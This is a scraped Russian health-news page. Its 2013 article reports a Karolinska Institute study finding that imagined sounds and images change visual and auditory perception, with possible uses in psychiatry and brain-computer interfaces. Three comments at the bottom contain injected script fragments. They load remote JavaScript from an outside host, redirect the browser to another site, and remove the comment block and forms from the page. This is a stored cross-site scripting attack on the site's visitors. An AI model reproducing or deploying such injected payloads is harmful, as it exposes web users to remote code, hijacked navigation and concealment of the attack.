Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  О чем воображать, чтобы р...  >>  О чем воображать, чтобы реальность казалась лучше
 
Обратная связь
 

О чем воображать, чтобы реальность казалась лучше

Размер шрифта
30 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Исследование, проведенное в Каролинском Институте (Швеция), показало, что наше воображение влияет на мировосприятие в намного большей степени, чем мы думаем.

«Воображаемое и реальное зачастую кажутся нам совершенно различными и не связанными друг с другом явлениями», – рассказывает Кристофер Бергер, глава исследования. «Тем не менее, в ходе нашего исследования мы выяснили, что на самом деле ситуация обстоит несколько иначе. Воображение напрямую меняет структуру нашего восприятия. Причем это утверждение работает в самых разных комбинациях: звуковые фантазии могут трансформировать наше зрительное восприятие, и наоборот».

Структура этой научной работы представлена серией экспериментов, в основе которых лежит использование разнообразных иллюзий. Участниками исследования стали девяносто шесть здоровых добровольцев.

В первом эксперименте изучалось влияние воображаемого звука на зрительное восприятие. Участники наблюдали за двумя объектами, которые в определенный момент пространственно сближались. При этом если испытуемые представляли в своей голове громкий звук, им казалось, что объекты столкнулись, хотя в действительности это было невозможно понять наверняка.

Во втором эксперименте оценивалось влияние зрительных иллюзий на слуховое восприятие. В комнате раздавался некий звук, а на стене на мгновение появлялось изображение белого круга. При этом участником казалось, что звук исходил именно из этого места, хотя в действительности это было не так.

В третьем эксперименте ученые анализировали влияние тембра голоса одного человека на смысловое восприятие другого.

Авторы исследования считают, что результаты их работы могут быть полезны для дальнейшего изучения механизмов, лежащих в основе психиатрических заболеваний. При многих из них (например, при шизофрении) мозг не может нормально разделять действительность и воображение.

Другая потенциальная сфера применения данного исследования – разработка нейрокомпьютерных интерфейсов, которые созданы для облегчения жизни парализованных людей. Эти интерфейсы позволяют людям управлять внешними устройствами силой своего воображения.

Пока ученные не решили о чем надо воображать, чтобы реальность казалась лучше. Но мы уверены, что это не за горами!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как первым увидеть в толпе звезду? У нас есть научный ответ!   Почему вы зеваете? Чтобы остудить мозги!   Оказывается, мозг знает, как нам не выпить лишнего! Почему же мы напиваемся?   У больных раком мозга появилась новая надежда!  
22 июля 2013Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению 17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта
 
06 июня 2013Ваши сопли скажут, сумасшедший ли вы 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Как сохранить мозги в 40 лет
Как сохранить мозги в 30 лет
Можно ли беременеть после 40?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.